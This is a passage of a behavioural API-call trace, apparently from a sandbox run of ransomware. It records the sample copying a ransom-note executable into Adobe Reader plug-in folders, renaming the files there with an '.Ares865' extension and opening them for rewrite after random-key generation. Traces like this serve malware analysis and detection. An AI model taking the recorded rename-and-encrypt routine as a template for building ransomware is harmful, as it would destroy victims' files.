szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.604] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.605] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.605] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR" [0172.606] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR" [0172.606] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.607] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.607] GetLastError () returned 0x0 [0172.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.607] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.607] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.607] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.608] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.TUR" | out: lpString1="Flash.TUR") returned="Flash.TUR" [0172.608] lstrlenW (lpString="Flash.TUR") returned 9 [0172.608] lstrlenW (lpString="Ares865") returned 7 [0172.608] lstrcmpiW (lpString1="ash.TUR", lpString2="Ares865") returned 1 [0172.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\Flash.TUR.Ares865") returned 93 [0172.608] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\Flash.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\flash.tur"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\Flash.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\flash.tur.ares865"), dwFlags=0x1) returned 1 [0172.616] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\Flash.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\flash.tur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.616] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.616] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.617] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.660] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.661] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.661] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.661] lstrcpyW (in: lpString1=0x2cce498, lpString2="MCIMPP.TUR" | out: lpString1="MCIMPP.TUR") returned="MCIMPP.TUR" [0172.661] lstrlenW (lpString="MCIMPP.TUR") returned 10 [0172.661] lstrlenW (lpString="Ares865") returned 7 [0172.661] lstrcmpiW (lpString1="MPP.TUR", lpString2="Ares865") returned 1 [0172.662] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\MCIMPP.TUR.Ares865") returned 94 [0172.662] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\MCIMPP.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\mcimpp.tur"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\MCIMPP.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\mcimpp.tur.ares865"), dwFlags=0x1) returned 1 [0172.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\MCIMPP.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\mcimpp.tur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.665] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7680) returned 1 [0172.665] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.666] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.666] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.673] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.674] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.TUR" | out: lpString1="QuickTime.TUR") returned="QuickTime.TUR" [0172.674] lstrlenW (lpString="QuickTime.TUR") returned 13 [0172.674] lstrlenW (lpString="Ares865") returned 7 [0172.674] lstrcmpiW (lpString1="ime.TUR", lpString2="Ares865") returned 1 [0172.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\QuickTime.TUR.Ares865") returned 97 [0172.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\QuickTime.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\quicktime.tur"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\QuickTime.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\quicktime.tur.ares865"), dwFlags=0x1) returned 1 [0172.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\QuickTime.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\quicktime.tur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.676] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.677] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.677] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.677] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.681] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.681] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.681] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.682] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.TUR" | out: lpString1="WindowsMedia.TUR") returned="WindowsMedia.TUR" [0172.682] lstrlenW (lpString="WindowsMedia.TUR") returned 16 [0172.682] lstrlenW (lpString="Ares865") returned 7 [0172.682] lstrcmpiW (lpString1="dia.TUR", lpString2="Ares865") returned 1 [0172.682] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\WindowsMedia.TUR.Ares865") returned 100 [0172.682] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\WindowsMedia.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\windowsmedia.tur"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\WindowsMedia.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\windowsmedia.tur.ares865"), dwFlags=0x1) returned 1 [0172.684] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\WindowsMedia.TUR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\windowsmedia.tur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.684] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.684] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.692] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.693] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV" [0172.693] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV" [0172.693] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.693] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.694] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.695] GetLastError () returned 0x0 [0172.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.695] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548d51a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548d51a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.695] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.SLV" | out: lpString1="Flash.SLV") returned="Flash.SLV" [0172.695] lstrlenW (lpString="Flash.SLV") returned 9 [0172.695] lstrlenW (lpString="Ares865") returned 7 [0172.695] lstrcmpiW (lpString1="ash.SLV", lpString2="Ares865") returned 1 [0172.696] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\Flash.SLV.Ares865") returned 93 [0172.696] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\Flash.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\flash.slv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\Flash.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\flash.slv.ares865"), dwFlags=0x1) returned 1 [0172.701] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\Flash.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\flash.slv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.701] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.701] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.702] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.702] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.707] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.708] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.708] lstrcpyW (in: lpString1=0x2cce498, lpString2="MCIMPP.SLV" | out: lpString1="MCIMPP.SLV") returned="MCIMPP.SLV" [0172.708] lstrlenW (lpString="MCIMPP.SLV") returned 10 [0172.708] lstrlenW (lpString="Ares865") returned 7 [0172.708] lstrcmpiW (lpString1="MPP.SLV", lpString2="Ares865") returned 1 [0172.709] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\MCIMPP.SLV.Ares865") returned 94 [0172.709] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\MCIMPP.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\mcimpp.slv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\MCIMPP.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\mcimpp.slv.ares865"), dwFlags=0x1) returned 1 [0172.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\MCIMPP.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\mcimpp.slv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.710] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.711] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.711] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.711] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.717] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.718] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.718] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.719] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.SLV" | out: lpString1="QuickTime.SLV") returned="QuickTime.SLV" [0172.719] lstrlenW (lpString="QuickTime.SLV") returned 13 [0172.719] lstrlenW (lpString="Ares865") returned 7 [0172.719] lstrcmpiW (lpString1="ime.SLV", lpString2="Ares865") returned 1 [0172.719] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\QuickTime.SLV.Ares865") returned 97 [0172.719] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\QuickTime.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\quicktime.slv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\QuickTime.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\quicktime.slv.ares865"), dwFlags=0x1) returned 1 [0172.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\QuickTime.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\quicktime.slv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.727] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.728] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.728] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.729] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.SLV" | out: lpString1="WindowsMedia.SLV") returned="WindowsMedia.SLV" [0172.729] lstrlenW (lpString="WindowsMedia.SLV") returned 16 [0172.729] lstrlenW (lpString="Ares865") returned 7 [0172.729] lstrcmpiW (lpString1="dia.SLV", lpString2="Ares865") returned 1 [0172.729] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\WindowsMedia.SLV.Ares865") returned 100 [0172.729] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\WindowsMedia.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\windowsmedia.slv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\WindowsMedia.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\windowsmedia.slv.ares865"), dwFlags=0x1) returned 1 [0172.731] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\WindowsMedia.SLV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\windowsmedia.slv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.731] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.731] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.732] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.732] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.737] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.738] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.738] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.738] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY" [0172.738] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY" [0172.739] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\HOW TO 